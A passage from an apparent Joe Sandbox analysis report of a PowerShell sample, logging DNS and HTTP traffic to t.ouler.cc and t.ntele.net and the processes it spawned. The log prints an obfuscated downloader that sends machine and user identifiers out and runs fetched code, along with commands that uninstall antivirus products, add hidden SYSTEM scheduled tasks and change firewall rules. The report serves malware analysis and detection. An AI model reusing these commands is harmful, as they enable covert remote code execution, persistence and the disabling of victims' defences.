query t.ouler.cc A (IP address) IN (0x0001) (0) Jun 16, 2021 18:28:56.570617914 CEST 192.168.2.4 8.8.8.8 0xb343 Standard query t.ntele.net A (IP address) IN (0x0001) (0) DNS Answers Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jun 16, 2021 8.8.8.8 192.168.2.4 0x7c0a No error (0) t.ouler.cc cvc.7766.org CNAME IN (0x0001) 18:28:46.978871107 (Canonical name) CEST Jun 16, 2021 8.8.8.8 192.168.2.4 0x7c0a No error (0) cvc.7766.org 209.141.33.145 A (IP address) IN (0x0001) 18:28:46.978871107 CEST Jun 16, 2021 8.8.8.8 192.168.2.4 0x75d2 No error (0) t.ouler.cc cvc.7766.org CNAME IN (0x0001) 18:28:47.054102898 (Canonical name) CEST Jun 16, 2021 8.8.8.8 192.168.2.4 0x75d2 No error (0) cvc.7766.org 209.141.33.145 A (IP address) IN (0x0001) 18:28:47.054102898 CEST HTTP Request Dependency Graph t.ouler.cc HTTP Packets Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.4 49758 209.141.33.145 80 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe kBytes Timestamp transferred Direction Data Jun 16, 2021 2077 OUT GET /a.jsp?_20210616?computer*computer$*FB9C3542-FA73-1B4E-FBA4-60E77BE54AED*903551864 HTTP/1.1 18:28:47.353111982 CEST Host: t.ouler.cc Connection: Keep-Alive Copyright Joe Security LLC 2021 Page 20 of 34 kBytes Timestamp transferred Direction Data Jun 16, 2021 2079 IN HTTP/1.1 200 OK 18:28:47.556508064 CEST Server: nginx Date: Wed, 16 Jun 2021 16:28:47 GMT Content-Type: application/octet-stream Content-Length: 10961 Last-Modified: Wed, 09 Jun 2021 00:36:50 GMT Connection: keep-alive ETag: "60c00d22-2ad1" Accept-Ranges: bytes Data Raw: 52 49 41 64 43 4e 68 46 77 65 64 76 63 76 64 51 61 63 4d 6a 58 58 57 65 2b 41 74 61 77 70 45 37 4f 4e 2f 52 37 32 2f 48 73 43 34 51 79 64 5a 54 4d 73 4c 62 33 41 77 79 37 4a 70 67 33 43 39 68 74 61 4f 38 47 4a 74 53 70 79 75 49 6e 49 2b 50 38 44 70 34 67 4d 56 7a 67 50 4b 6b 35 46 54 71 30 49 4b 4e 76 6d 77 54 39 4e 64 59 53 50 42 75 47 61 50 58 44 72 35 43 53 75 6b 77 35 39 6f 4d 34 51 35 67 6c 42 33 62 7a 58 79 41 5a 30 31 35 39 36 38 37 52 68 71 65 45 2 f 2b 71 4c 55 36 42 44 51 75 54 51 71 69 36 71 4e 51 3d 0a 49 60 45 58 20 24 28 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 53 74 72 65 61 6d 52 65 61 64 65 72 20 28 24 28 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 43 6f 6d 70 72 65 73 73 69 6f 6e 2e 44 65 66 6c 61 74 65 53 74 72 65 61 6d 20 28 24 28 4e 65 77 2d 4f 62 6a 65 63 74 20 49 4f 2e 4d 65 6d 6f 72 79 53 74 72 65 61 6d 20 28 2c 24 28 27 34 64 37 39 63 37 30 65 66 33 63 38 39 61 65 62 61 62 66 34 36 65 62 61 61 31 62 39 62 66 37 32 33 61 33 62 63 35 36 30 32 62 63 37 33 30 39 38 38 35 61 32 39 35 37 33 37 65 66 61 35 31 65 66 32 65 36 30 30 33 30 35 63 62 33 32 63 61 33 36 63 39 32 32 66 39 66 64 35 35 31 37 64 37 35 66 37 66 66 66 33 35 31 34 63 31 66 66 33 33 64 38 34 36 65 30 64 63 62 66 66 65 37 32 32 32 36 37 31 33 66 61 33 66 38 61 66 31 36 37 64 64 36 63 38 31 65 39 36 64 32 31 63 39 30 62 66 62 65 66 62 66 66 66 62 66 66 37 33 38 66 37 62 61 31 35 66 64 39 66 64 61 66 38 63 33 38 64 62 64 62 39 30 38 38 65 35 33 38 66 66 61 39 66 62 63 31 30 35 35 36 36 32 62 35 36 64 37 32 65 39 32 66 65 65 66 66 66 35 31 63 36 33 66 35 61 61 31 38 64 34 62 66 34 62 65 32 30 32 34 64 61 66 66 66 65 66 35 33 66 65 62 62 62 31 34 62 34 33 66 39 39 33 31 66 38 63 32 65 32 66 65 65 66 37 66 66 65 32 33 64 61 61 33 39 36 32 36 38 65 34 30 36 30 65 62 62 36 32 38 66 61 65 66 65 66 66 66 61 61 66 63 38 39 66 34 65 39 34 64 35 39 30 66 38 61 63 63 32 38 39 63 61 61 36 38 38 63 38 65 61 66 63 66 62 34 34 36 37 65 30 37 33 32 35 66 65 33 62 39 33 31 66 33 37 33 30 62 65 65 63 39 39 36 37 63 36 63 39 30 39 38 63 36 35 65 37 31 62 32 36 64 64 66 35 34 36 62 39 37 33 62 65 32 37 39 33 63 33 64 34 61 61 30 66 33 63 30 38 66 61 30 66 37 66 39 61 33 34 36 64 65 39 30 63 33 37 65 65 38 63 33 34 37 62 65 33 37 63 35 32 64 36 35 33 39 34 38 66 65 64 30 38 63 32 30 39 66 39 34 32 37 39 66 32 61 33 30 30 34 63 33 33 63 32 33 39 63 64 33 35 33 30 34 31 34 64 31 38 62 39 32 36 33 39 30 31 61 35 30 31 33 61 31 31 31 36 32 36 66 39 61 62 62 36 63 39 30 39 33 30 61 32 39 64 66 62 62 61 34 61 64 63 63 65 63 31 36 64 30 34 39 64 33 34 65 38 30 35 39 66 36 32 39 33 64 37 30 62 31 66 33 33 32 37 65 32 62 63 64 66 37 36 31 62 37 65 33 37 34 34 30 32 63 64 64 33 30 30 30 64 37 34 34 34 64 61 30 63 31 35 37 30 35 32 30 64 34 35 34 31 38 34 33 65 65 39 39 63 31 35 38 61 32 30 33 33 36 31 38 38 36 65 35 65 63 65 39 32 61 65 32 35 63 35 32 38 35 37 38 35 35 61 39 39 37 65 31 33 38 32 61 32 39 32 31 30 66 34 30 65 35 64 36 39 61 66 63 38 31 38 61 62 32 63 32 62 65 65 33 37 65 63 39 37 38 30 37 37 61 65 31 35 31 33 35 66 38 64 34 36 63 65 39 34 38 66 38 37 31 35 37 30 63 33 31 35 35 36 37 37 65 39 66 32 36 63 37 65 34 35 66 64 63 65 31 33 36 32 35 36 34 35 62 38 37 62 65 30 39 66 62 36 31 38 32 63 38 30 61 36 65 66 32 65 39 33 65 63 30 38 32 62 62 Data Ascii: RIAdCNhFwedvcvdQacMjXXWe+AtawpE7ON/R72/HsC4QydZTMsLb3Awy7Jpg3C9htaO8GJtSpyuInI +P8Dp4gMVzgPKk5FTq0IKNvmwT9NdYSPBuGaPXDr5CSukw59oM4Q5glB3bzXyAZ0159687RhqeE/+qLU6BDQuTQqi6 qNQ=I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.Me moryStream (,$('4d79c70ef3c89aebabf46ebaa1b9bf723a3bc5602bc7309885a295737efa51ef2e600305cb32ca36c922 f9fd5517d75f7fff3514c1ff33d846e0dcbffe72226713fa3f8af167dd6c81e96d21c90bfbefbfffbff738f7ba15fd9fdaf8c38dbdb908 8e538ffa9fbc1055662b56d72e92feefff51c63f5aa18d4bf4be2024dafffef53febbb14b43f9931f8c2e2feef7ffe23daa3 96268e4060ebb628faefefffaafc89f4e94d590f8acc289caa688c8eafcfb4467e07325fe3b931f3730beec9967c6c9098c6 5e71b26ddf546b973be2793c3d4aa0f3c08fa0f7f9a346de90c37ee8c347be37c52d653948fed08c209f94279f2a3004c33c 239cd3530414d18b9263901a5013a111626f9abb6c90930a29dfbba4adccec16d049d34e8059f6293d70b1f3327e2bcdf761 b7e374402cdd3000d7444da0c1570520d4541843ee99c158a203361886e5ece92ae25c52857855a997e1382a29 210f40e5d69afc818ab2c2bee37ec978077ae15135f8d46ce948f871570c3155677e9f26c7e45fdce13625645b87be09fb61 82c80a6ef2e93ec082bb Code Manipulations Statistics Behavior Click to jump to process System Behavior Analysis Process: powershell.exe PID: 7148 Parent PID: 5984 General Copyright Joe Security LLC 2021 Page 21 of 34 Start time: 18:27:26 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\malicious.ps1' Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high File Activities Show Windows behavior File Created File Deleted File Written File Read Analysis Process: conhost.exe PID: 6164 Parent PID: 7148 General Start time: 18:27:27 Start date: 16/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high Analysis Process: powershell.exe PID: 5916 Parent PID: 7148 General Start time: 18:27:30 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -c IEx =gim Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: high File Activities Show Windows behavior Copyright Joe Security LLC 2021 Page 22 of 34 File Created File Deleted File Written File Read Analysis Process: cmd.exe PID: 2856 Parent PID: 7148 General Start time: 18:28:11 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high File Activities Show Windows behavior Analysis Process: WMIC.exe PID: 6488 Parent PID: 2856 General Start time: 18:28:12 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%Eset%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate File Activities Show Windows behavior File Written Analysis Process: cmd.exe PID: 1076 Parent PID: 7148 General Start time: 18:28:12 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Copyright Joe Security LLC 2021 Page 23 of 34 Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%%K aspersky%%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high File Activities Show Windows behavior Analysis Process: WMIC.exe PID: 5216 Parent PID: 1076 General Start time: 18:28:13 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%%Kaspersky%%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate File Activities Show Windows behavior File Written Analysis Process: cmd.exe PID: 5960 Parent PID: 7148 General Start time: 18:28:13 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high Analysis Process: WMIC.exe PID: 6176 Parent PID: 5960 General Start time: 18:28:14 Start date: 16/06/2021 Copyright Joe Security LLC 2021 Page 24 of 34 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%avast%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate Analysis Process: cmd.exe PID: 2240 Parent PID: 7148 General Start time: 18:28:14 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high Analysis Process: WMIC.exe PID: 6332 Parent PID: 2240 General Start time: 18:28:15 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%avp%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate Analysis Process: cmd.exe PID: 6172 Parent PID: 7148 General Start time: 18:28:15 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Copyright Joe Security LLC 2021 Page 25 of 34 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high Analysis Process: WMIC.exe PID: 6796 Parent PID: 6172 General Start time: 18:28:16 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%Security%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate Analysis Process: cmd.exe PID: 4904 Parent PID: 7148 General Start time: 18:28:16 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: WMIC.exe PID: 6992 Parent PID: 4904 General Start time: 18:28:16 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%AntiVirus%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Copyright Joe Security LLC 2021 Page 26 of 34 Analysis Process: cmd.exe PID: 4780 Parent PID: 7148 General Start time: 18:28:17 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c start /b wmic.exe product where 'name like '%Norton Secur ity%'' call uninstall /nointeractive Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: WMIC.exe PID: 7032 Parent PID: 4780 General Start time: 18:28:17 Start date: 16/06/2021 Path: C:\Windows\System32\wbem\WMIC.exe Wow64 process (32bit): false Commandline: wmic.exe product where 'name like '%Norton Security%'' call uninstall /nointeractive Imagebase: 0x7ff6fa870000 File size: 521728 bytes MD5 hash: EC80E603E0090B3AC3C1234C2BA43A0F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: cmd.exe PID: 7048 Parent PID: 7148 General Start time: 18:28:18 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 1668 Parent PID: 7148 General Start time: 18:28:20 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Copyright Joe Security LLC 2021 Page 27 of 34 Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn blackball1 /F /tr blackball1 Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 3880 Parent PID: 7148 General Start time: 18:28:21 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \hOSkYCwoL /F /tr 'powershell -w hidden -c PS_CMD' Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: powershell.exe PID: 6132 Parent PID: 968 General Start time: 18:28:21 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c PS_CMD Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Analysis Process: conhost.exe PID: 4676 Parent PID: 6132 General Start time: 18:28:22 Start date: 16/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Copyright Joe Security LLC 2021 Page 28 of 34 Analysis Process: schtasks.exe PID: 5448 Parent PID: 7148 General Start time: 18:28:25 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn \hOSkYCwoL Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 5756 Parent PID: 7148 General Start time: 18:28:30 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn RabF BPMZ\r1JNCdQED0 /F /tr 'powershell -w hidden -c PS_CMD' Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 6036 Parent PID: 7148 General Start time: 18:28:35 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn RabFBPMZ\r1JNCdQED0 Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: powershell.exe PID: 2804 Parent PID: 968 General Start time: 18:28:35 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Copyright Joe Security LLC 2021 Page 29 of 34 Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u) {$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d [173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert] ::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJ wvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbm pZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Ex ponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvid er;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1Crypt oServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char []]$b)}}}$url='http://'+'t.oul'+'er.cc';a($url+'/a.jsp?_20210616?'+(@($env:COMPUTERNAME,$e nv:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Analysis Process: conhost.exe PID: 6980 Parent PID: 2804 General Start time: 18:28:37 Start date: 16/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 5628 Parent PID: 7148 General Start time: 18:28:41 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn Micr oSoft\Windows\k7xmVIWZ\FKaz6wpoqO /F /tr 'powershell -w hidden -c PS_CMD' Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 6372 Parent PID: 7148 General Start time: 18:28:43 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /run /tn MicroSoft\Windows\k7xmVIWZ\FKaz6wpoqO Imagebase: 0x7ff7dafb0000 Copyright Joe Security LLC 2021 Page 30 of 34 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: powershell.exe PID: 6620 Parent PID: 968 General Start time: 18:28:44 Start date: 16/06/2021 Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): false Commandline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u) {$d=(Ne`w-Obj`ect Net.WebC`lient).'DownloadData'($u);$c=$d.count;if($c -gt 173){$b=$d [173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert] ::FromBase64String('xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJ wvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbm pZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0=');$p.Ex ponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvid er;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1Crypt oServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char []]$b)}}}$url='http://'+'t.nte'+'le.net';a($url+'/a.jsp?_20210616?'+(@($env:COMPUTERNAME,$ env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*')) Imagebase: 0x7ff7bedd0000 File size: 447488 bytes MD5 hash: 95000560239032BC68B4C2FDFCDEF913 Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Analysis Process: conhost.exe PID: 6300 Parent PID: 6620 General Start time: 18:28:44 Start date: 16/06/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff724c50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: cmd.exe PID: 6672 Parent PID: 7148 General Start time: 18:29:25 Start date: 16/06/2021 Path: C:\Windows\System32\cmd.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\cmd.exe' /c netsh.exe firewall add portopening tcp 65529 SDNSd Imagebase: 0x7ff622070000 File size: 273920 bytes MD5 hash: 4E2ACF4F8A396486AB4268C94A6A245F Has elevated privileges: true Copyright Joe Security LLC 2021 Page 31 of 34 Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: netsh.exe PID: 5840 Parent PID: 6672 General Start time: 18:29:25 Start date: 16/06/2021 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: netsh.exe firewall add portopening tcp 65529 SDNSd Imagebase: 0x7ff68a810000 File size: 92672 bytes MD5 hash: 98CC37BBF363A38834253E22C80A8F32 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: netsh.exe PID: 6508 Parent PID: 7148 General Start time: 18:29:27 Start date: 16/06/2021 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' interface portproxy add v4tov4 listenport=65529 connectadd ress=1.1.1.1 connectport=53 Imagebase: 0x7ff68a810000 File size: 92672 bytes MD5 hash: 98CC37BBF363A38834253E22C80A8F32 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: netsh.exe PID: 6668 Parent PID: 7148 General Start time: 18:29:30 Start date: 16/06/2021 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny445 dir=in protocol =tcp localport=445 action=block Imagebase: 0x7ff68a810000 File size: 92672 bytes MD5 hash: 98CC37BBF363A38834253E22C80A8F32 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: netsh.exe PID: 5772 Parent PID: 7148 General Copyright Joe Security LLC 2021 Page 32 of 34 Start time: 18:29:30 Start date: 16/06/2021 Path: C:\Windows\System32\netsh.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\netsh.exe' advfirewall firewall add rule name=deny135 dir=in protocol =tcp localport=135 action=block Imagebase: 0x7ff68a810000 File size: 92672 bytes MD5 hash: 98CC37BBF363A38834253E22C80A8F32 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 4244 Parent PID: 7148 General Start time: 18:29:31 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn blackball /F Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 6176 Parent PID: 7148 General Start time: 18:29:31 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn t.pp6r1.com /F Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 2464 Parent PID: 7148 General Start time: 18:29:32 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): false Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa2 /F Imagebase: 0x7ff7dafb0000 File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Copyright Joe Security LLC 2021 Page 33 of 34 Has administrator privileges: true Programmed in: C, C++ or other language Analysis Process: schtasks.exe PID: 4968 Parent PID: 7148 General Start time: 18:29:32 Start date: 16/06/2021 Path: C:\Windows\System32\schtasks.exe Wow64 process (32bit): Commandline: 'C:\Windows\system32\schtasks.exe' /delete /tn Rtsa1 /F Imagebase: File size: 226816 bytes MD5 hash: 838D346D1D28F00783B7A6C6BD03A0DA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Disassembly Code Analysis Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond Copyright Joe Security LLC 2021 Page 34 of 34